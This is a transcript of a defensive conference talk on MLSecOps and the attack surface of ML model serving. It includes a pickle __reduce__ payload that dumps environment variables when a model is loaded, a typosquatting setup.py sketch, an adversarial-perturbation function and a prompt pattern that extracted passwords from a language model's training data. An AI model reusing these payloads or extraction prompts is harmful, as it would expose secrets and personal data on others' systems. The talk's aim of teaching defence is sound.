Thank you, Ed. Yeah, so my name is Adrian Gonzalez-Martin. I'm a machine learning engineer at Seldon, and I'm also a fellow of the Institute for Ethical AI and Machine Learning. What we're going to talk about today is the security challenges we face in machine learning and in the MLOps space. This is a space we haven't dived into much so far. It's very well researched in the DevOps area, for example, but not in the machine learning space. It's probably going to be the next frontier, something we need to start thinking about, because we're now starting to have these massive MLOps platforms. We know how to tackle a few problems and we have a lot of tools, but we haven't looked much at the attack surface these platforms expose and how to cover it. Anything related to MLOps brings a new set of challenges that weren't there before with DevOps.

And just to clarify: we're going to see some examples and some technical solutions. However, at the end of the day, the only way to solve most of these problems is relying on humans, relying on processes. Which, again, was the same thing in the DevOps space, right? It's all about getting everyone to talk and getting everyone to work together.

Following up from that, what we'd like to talk about is MLSecOps, which is the natural extension of SecOps to the MLOps space. It combines several disciplines: you have a bit of DevOps, a bit of SecOps, a bit of MLOps. And if we want to look at solutions in this area, at how we solve this, we can always go back to the DevOps book, take some pages from it, and see what was done there to nail SecOps on top of classic DevOps.

If we look at what was done there, we can see, for example, the OWASP Top 10 vulnerabilities. OWASP is an institution that does a lot of things; one of them is publishing this top-10 assessment of the most common vulnerabilities we see in web systems, mainly web applications. One of the cool things about OWASP is that the target audience is not security researchers. Security researchers are the ones building the list, but the target audience is actual practitioners: software engineers and DevOps people. Something else that's interesting is that the items are targeted directly at them, so things they have control over, things they can apply to their own products. Some of them apply more to software engineers, others more to DevOps, like securing systems, having proper access control, et cetera.

What we're going to see during this talk is how we can build a similar list, but for machine learning systems, for MLOps platforms, and how that extends naturally to data scientists and the work they do. Some of you may be familiar with this slide: across the board there is an interest in securing MLOps systems. This is the list of principles that the LF AI & Data foundation published for Trusted AI, things that would be really nice to have in any machine learning system. One of them is security.
The problem is that we don't even quite know what that means. And that's why we started this working group: defining what the best practices would be to secure the end-to-end machine learning lifecycle. Taking the slide back from the keynote, this is roughly how a whole end-to-end machine learning system looks. And as you can see, there is a security risk, an attack surface, on every component. Now, today we only have 30 minutes, maybe less with questions, so we're not going to be able to focus on everything. What we're going to do instead is focus on the serving aspect, the last row of that diagram.

Just to make sure we're all on the same page about what we mean by that last stage, the deployment or serving stage: what we generally have in MLOps systems is that the data scientist provides either a set of model weights, which is the binary artifact, the binary output from training the model, or sometimes the data scientist, or a machine learning engineer or software engineer, provides a piece of custom code, some kind of custom inference server that knows how to run the model. Or sometimes both. Once you have that, you just deploy it. And what do we have when we deploy it? Usually some sort of inference server running that set of model weights, or that bit of custom code, the glue code relevant to your use case, which knows how to load that blob and how to perform inference with it.

Throughout the talk we're going to run a few examples of how these security surfaces can be exposed. So the first thing we're going to do is deploy a model on our test Kubernetes cluster and see how that looks. I hope you can all see this correctly; it may be a bit hard to read from the back. First, the training stage, which we'll run through very quickly: you have some requirements, you install those, you train a scikit-learn model, a simple example, and you can see you can run predictions with it. What you do next is serialise it. For frameworks like scikit-learn, the recommended approach to serialising is to use something like joblib, which is essentially pickling the thing. We're going to talk more about pickles in a moment. The binary artifact looks something like this: a big blob where you can recognise a few things, but most of it doesn't make any sense.

On our cluster we have MinIO running, which is where we store our artifacts, so we copy the artifact to MinIO. And then we deploy it; in this case with Seldon Core, but it doesn't really matter, any serving engine would do the same thing: you have some artifact and you deploy it to your cluster. When you deploy that, what you get is a set of pods running there. Sorry if the output is hard to read from where you are sitting; hopefully what I'm saying makes sense. Once we have that in there, we can send requests: we take a NumPy tensor, encode it into the V2 inference protocol, which is the protocol that Seldon Core speaks in this case, and we get the response back; when we decode it, it's a NumPy array again. So it's all looking good.
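To make that flow concrete, here is a minimal sketch along the lines of the demo; the dataset, file names, host and model name are illustrative placeholders, and it assumes the deployed model ends up exposed at the usual V2 inference path.

```python
# Minimal sketch of the demo flow: train a scikit-learn model, serialise it
# with joblib, and (once deployed) query it over the V2 inference protocol.
import joblib
import numpy as np
import requests
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression

X, y = load_iris(return_X_y=True)
model = LogisticRegression(max_iter=1000).fit(X, y)

# The "binary artifact": under the hood this is a pickle of the model object.
joblib.dump(model, "model.joblib")

# After copying the artifact to MinIO and deploying it with a serving engine
# such as Seldon Core, the model is reachable over HTTP. Encode one NumPy row
# as a V2 inference request:
payload = {
    "inputs": [{
        "name": "predict",
        "shape": list(X[:1].shape),
        "datatype": "FP64",
        "data": X[:1].flatten().tolist(),
    }]
}
resp = requests.post(
    "http://localhost:8080/v2/models/iris/infer",  # placeholder host and model name
    json=payload,
)
print(resp.json()["outputs"][0]["data"])  # decodes back into an array of predictions
```

The line that matters for what comes next is the joblib.dump call: that artifact is just a pickle.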
So we now have our model deployed. Let's look at what security risk areas we can see there.

We'll start with the first one. We briefly mentioned pickles: we are pickling our artifacts. Pickles, for those of you who may not be familiar with them, are Python's native way of serialising any object: classes, functions, dictionaries, anything. What that means is that when you load a pickle, it can run arbitrary code, anything at all. So one risk area is: what happens if an attacker somehow gets access to this pickle? They can run anything they want. Let's see a quick example.

What we're going to do, hopefully you can see it on the screen, is tweak the model we are about to serialise to inject a poisoned __reduce__ method, which is the method pickle uses to decide how to reconstruct the object. We make sure that when the model gets serialised, it serialises a call to os.system, and in this case that call dumps the environment variables of the pod where the model is running. So we do that here, and the blob changes; the pickle changes, but it's still a big binary blob, so it's very hard to see what's going on in there. We upload that to MinIO and deploy our new, unsafe model. And if we exec into that pod, we can see that it did in fact create the file with all the environment variables running there. So, same as before, you can run anything; you have full access.

Pickles are super widespread across machine learning frameworks and libraries. You can see a couple of examples here: we talked about scikit-learn, where the docs recommend just pickling your artifact; PyTorch also uses pickles, again another potential surface to do anything you want; Keras as well. Everything uses pickles, and as you can see, it's like leaving a wide-open door into your cluster. It's also very hard to scan pickles to tell whether they are malicious or not, so this is mainly a question of trust. The kind of solution here is to ensure there is trust across all the steps of the supply chain: signing the artifacts, making sure they come from the right place, from someone we trust, and that they haven't been poisoned along the way.
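Going back to the demo for a second, here is a rough sketch of what that poisoned artifact looks like; the class name, file name and command are illustrative, and in the actual demo it's the trained model object itself that gets patched before serialising.

```python
import os
import pickle

class PoisonedModel:
    """Stand-in for a model object that has been tweaked before serialisation."""

    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct the object, so returning
        # (os.system, (command,)) means that simply *loading* this pickle runs
        # the command, here dumping the pod's environment variables to a file.
        return os.system, ("env > /tmp/leaked-env.txt",)

with open("model.joblib", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# Anything that later calls pickle.load / joblib.load on this artifact, for
# example the inference server starting up, executes the command above with
# whatever permissions the serving pod happens to have.
```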
Now, the next security risk area: what happens when you give access to your model? In web applications, generally, when you give access to something, the worst that can happen is that someone who is not authorised gets at the wrong user's data, the wrong user details, et cetera. Here the problem is that it doesn't stop at that. Let's say you have an inference endpoint. Exposing an inference endpoint without any control essentially gives any attacker access to your model; it's still a black box, but even with just a black box they can learn a lot about it. And one thing they can learn is how to craft adversarial attacks.

I don't know how many of you are familiar with adversarial attacks, but you can see some examples on the right: the images in the left-hand column are the original images, and the images in the right-hand column are the poisoned ones, let's say. They are images with very small tweaks that are not perceptible to a human eye but are enough to completely change the prediction the model makes. If you expose your model and leave that black box wide open and widely accessible, an attacker can learn how to craft these things and basically render your machine learning system unusable, because they can tweak its behaviour at will. So in the MLOps space it's not just about authorising who has access to something, it's also about authorising the payload itself.

How can we do that? There are tools like Alibi Detect that provide detectors: you can train a detector to spot potential adversarial attacks and say, don't trust this payload. It looks fine, it's well formed, everything is okay, but this may be someone trying to probe the model or to learn how to craft adversarial attacks. And once we know that, we can react accordingly: don't forward it to the model, just log it, whatever you want.

There is a second level of access, which is white-box access. Before, we were talking about how, if an attacker gained write access to our model store, they could inject a poisoned pickle and have full access to the cluster. But even if they can only read the model artifact, they can still learn a lot about your model; they can leak some of the training data, they can do many things. And one of the interesting things is that we know they can do many things, but we don't even know how far this can go, because at the same time as we don't know how to secure these systems, there also haven't been that many attacks yet. We just know it's a wide-open door.

Going further, and this is from a real paper, you can even use models to leak some of the training data. You know generative models, which are pretty trendy, like large language models that generate text from a prompt. Researchers were testing this out and found that, for example, you can set a prompt like "user, name, password:" and the model will just leak that user's password, because it has learned to generate that data. Same thing with addresses, same thing with names. A whole bunch of personal details, entire snippets from the training data set, could get extracted verbatim.
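The talk itself doesn't show code for this, but going back to the adversarial-attack point, here is a generic, minimal sketch of a white-box FGSM-style perturbation, assuming a PyTorch image classifier with inputs in the [0, 1] range; black-box variants work along the same lines, just with many queries instead of gradients, and a detector like the ones in Alibi Detect would sit in front of the model to flag payloads like this before they reach it.

```python
import torch
import torch.nn.functional as F

def fgsm_perturb(model: torch.nn.Module,
                 x: torch.Tensor,
                 y: torch.Tensor,
                 eps: float = 0.01) -> torch.Tensor:
    """One FGSM step: a tiny, human-imperceptible tweak that can flip the prediction."""
    x_adv = x.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(x_adv), y)
    loss.backward()
    # Move each pixel a small step in the direction that increases the loss,
    # then clip back to the valid input range.
    return (x_adv + eps * x_adv.grad.sign()).clamp(0.0, 1.0).detach()
```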
So far we have talked about the model artifact and the model itself. If we keep going down toward the infra level, the next step is the custom code that you execute. We talked before about how data scientists generally deploy a model artifact, or you may have machine learning engineers who provide a custom inference runtime that runs in your pod. When you provide custom code, and when you use dependencies (we'll talk about dependencies later), you have the risk of introducing vulnerabilities.

The good thing here is that we're now getting closer to the classic DevOps space, where there is a lot more tooling around. For code vulnerabilities, we have static analysers that can tell us, well, this code probably has some vulnerabilities. But even dependencies can still be an issue. For example, here is an example from TensorFlow where loading a model definition from YAML could let an attacker run arbitrary code. YAML is a bit like pickles in that way: loaded the wrong way, it can construct arbitrary objects. YAML libraries generally have both a load function and a safe_load function that strips those constructs out. Again, there are tools like GitHub's built-in code scanning, or tools like Bandit, that we can use. In general, the good news is that the tools exist and we can use them.

However, when we talk about MLOps, we probably also have notebooks, right? Data scientists will often use notebooks, and notebooks also contain code. This is where it becomes a bit muddier: we have tools to do static analysis on a normal code base, but how do you ensure that in a notebook? A notebook which is not linear, where you don't know what extra context or extra state it may carry. Things start to get muddier here; this is where you reach the edge of what's out there, of what you can use and what you can automate.

Now, dependencies. We talked previously about dependencies; for example, we saw that TensorFlow issue that introduced a security risk. In general (this is partly a Python problem, but even if it's not Python, whatever the language) dependencies are hard. Any dependency you pull in, even one you trust, can introduce security risk. The problem is that you can track the first level of dependencies, but then you need to think about the second level, the third level, and that's where the issues come in. You can see here a few examples of how, when you don't have any control over what you install, you can run into trouble. These are some famous examples, and there are even more exotic, more historic ones.

For instance, going back to our demo, you saw that we installed scikit-learn. There was a security researcher who thought: a lot of people will make a typo when they run pip install; instead of typing scikit-learn they may type something slightly off. So he asked, what happens if I publish a package under that misspelled name? And because pip lets a package execute arbitrary code when it gets installed, what happens if I put a payload in there? Of course, everyone typing the wrong package name got it. I don't remember the numbers, but the attack was a massive success. He wasn't trying to do any harm, so the payloads were harmless, but it showed that even a random typo can introduce a lot of security risk.
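To make that concrete, here is a harmless sketch of what such a look-alike package could do; the package name and the payload are hypothetical, the only point being that whatever sits in setup.py runs on the machine doing the pip install.

```python
# setup.py of a hypothetical typosquatted package. Whatever sits here runs at
# install / build time, so mistyping a package name is all it takes.
import getpass
import socket

from setuptools import setup

# An attacker could run anything at this point; this harmless stand-in just
# shows that install-time code can see the host it is running on.
print(f"setup.py executed as {getpass.getuser()} on {socket.gethostname()}")

setup(
    name="sciki-learn",  # look-alike of scikit-learn, made up for illustration
    version="0.0.1",
    description="typosquatting proof-of-concept sketch",
    packages=[],
)
```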
I'm probably going to skip this example in the interest of time, but basically it shows how bad this problem can get. Using our requirements we installed something like four or five packages, and those four or five packages pulled in, in total, I think 50 or more dependencies, second, third, fourth level dependencies, some of which we have no control over. The solution here is generally to use lock files, which is something other languages rely on and Python not so much, although tools that do this are starting to appear; poetry, for example, gives you that kind of control.

Going forward, still in the dependencies world: generally the flow goes as you saw. You have the data scientist with a local requirements.txt, they install a few things, train their model, and so on. However, tools like MLflow, in order to let the data scientist also capture what those dependencies and their versions should look like, write out something like a conda.yaml file when you log a model, which basically says what the environment should look like. That's just a way for the data scientist to keep control over the versions of the packages they use, which is pretty cool. But what it means is that when you move to production and deploy that model, that set of dependencies gets installed dynamically. So you now have more issues, because it's no longer a static set of dependencies that you installed and baked into a Dockerfile; it's a dynamic set of dependencies coming from your model storage. A solution for this, and something we have been collaborating on with MLflow as part of the MLServer project, is to pre-build this environment so that we don't do that dynamic installation when we deploy models.

But going back to the main thread: dependencies are not so much an MLOps-specific problem, they are again a DevOps problem that we need to think about, which means there are a lot of tools we can use to detect CVEs, detect vulnerabilities, et cetera. For example, Dependabot, Dependency-Check or Safety are tools that will check for CVEs in your dependencies and flag when something is not secure. Even pip itself has had issues, so it's not just your dependencies, it's also the package managers you are using.
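Before moving on, here is a small sketch to make the dependency-explosion point visible on your own machine: it simply lists everything that actually ended up installed in the environment, not only the four or five names in requirements.txt.

```python
# List every distribution installed in the current environment. A handful of
# direct requirements easily turns into dozens of transitive packages, each of
# which is code someone else controls and that your inference server will import.
from importlib import metadata

installed = sorted(
    (dist.metadata["Name"], dist.version) for dist in metadata.distributions()
)
print(f"{len(installed)} packages installed")
for name, version in installed:
    print(f"  {name}=={version}")
```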
Which leads into the next level. We have looked at the model artifact, at the custom runtime with your custom code, at the dependencies; now let's look at where all of that runs, which, unless you are doing something unusual, will be some sort of Docker image. Docker images are essentially operating systems inside, so you get the same kind of vulnerabilities you would get on a regular computer: instead of a vulnerability in scikit-learn, you might have a vulnerability in something like Vim that happens to be in the image. But again, this is also part of the classic DevOps world, which means there are tools you can use to automate your scans. For example, in the Seldon Core and MLServer projects we use Snyk, which by the way is also a sponsor here, and it's a tool that lets you run automated scans every time you change anything. There are others, like Trivy by Aqua Security; there are a few of them.

And then, going down one extra layer, you have to think about the classic security risks you get at the infrastructure level. Here we're talking about things like RBAC, things like mTLS, the classic things you need to think about with Kubernetes. We're not going to dive too much into this one, because it's a massive topic; just today there was a whole co-located event that was only about security. If you want to learn more, I would watch those talks, which I guess will be on YouTube soon, or some of the other talks about security from the main KubeCon event.

So yeah, I know, right? We have seen a lot of security risk areas, and things look quite bad. What do we do about that? If we go through all the different vulnerabilities we saw, we can put together something similar to the OWASP Top 10 we talked about at the beginning, but for the MLOps space. Instead of broken access control, you have unrestricted model endpoints, access to your model as a black box. Instead of cryptographic failures, you have access to the actual model artifacts, where you could poison pickles, or access to your model as a white box, with full transparency into what's going on. And so on and so forth.

And again, as with OWASP, the good thing about this list, which covers some of the risks we have seen, is that the responsibility for preventing these risk areas is split: some of it falls to the data scientist, some to the machine learning engineer or software engineer, some to the DevOps expert. We can leverage that, and here is where the added value of platforms comes in. We can build platforms that ensure these things are built into our machine learning systems. Part of that is simply leveraging developer platforms to have single entry points into each one of the steps, so that you don't just hand a Kubernetes cluster to the data scientist and say, okay, deploy your models. Instead, you give them a platform, an abstraction, that has all these automations built in. That lets each piece of the puzzle be responsible for its own scope. For example, the DevOps engineer is the one ensuring that the Kubernetes platform where we deploy our models has mTLS, that the endpoints are restricted, et cetera. The software engineer or machine learning engineer building our custom runtimes gets just a few entry points to deploy those runtimes, which then trigger the automated scans, the automated dependency checks, the pre-building of dependencies, et cetera.
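Proper artifact signing is the real answer here, but as a simpler stand-in, here is a sketch of the kind of check such a platform could run behind the scenes: refuse to load any artifact whose digest doesn't match what the training pipeline published. The function names and the idea of a published digest are assumptions for illustration, not an existing Seldon Core or MLServer API.

```python
import hashlib

import joblib

def sha256_of(path: str) -> str:
    """Stream the artifact through SHA-256 so large model files are handled too."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def load_trusted_model(path: str, expected_digest: str):
    # The artifact is a pickle, so it is checked *before* it is ever loaded:
    # if it was swapped or tampered with in the model store, we refuse it.
    if sha256_of(path) != expected_digest:
        raise RuntimeError(f"untrusted artifact, digest mismatch: {path}")
    return joblib.load(path)
```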
And the same thing goes for the data scientist: give them a single entry point to provide their trained artifact, which lets us kick off scans on the pickles, sign the artifacts, et cetera. Going further, we can even create automations and tooling for data scientists so that the security is built in by design. For example, something we have been working on is a set of templates that have all these best practices, like code scans, dependency locks, et cetera, built in. Within the MLServer CLI, you can run mlserver init and it will create a project template with all these things built into it.

If you are interested in learning more about this, we have now kick-started a new working group as part of the CNCF, the MLSecOps working group. You can see the details there of when we meet to discuss these things and talk about best practices. The key goals are, for example, to finalise this set of top-ten vulnerabilities, set it in stone, and, going forward, to set security standards, et cetera. Finally, you can find the links to the resources for the talk on the deck, and that's it. That's all we have. Thank you.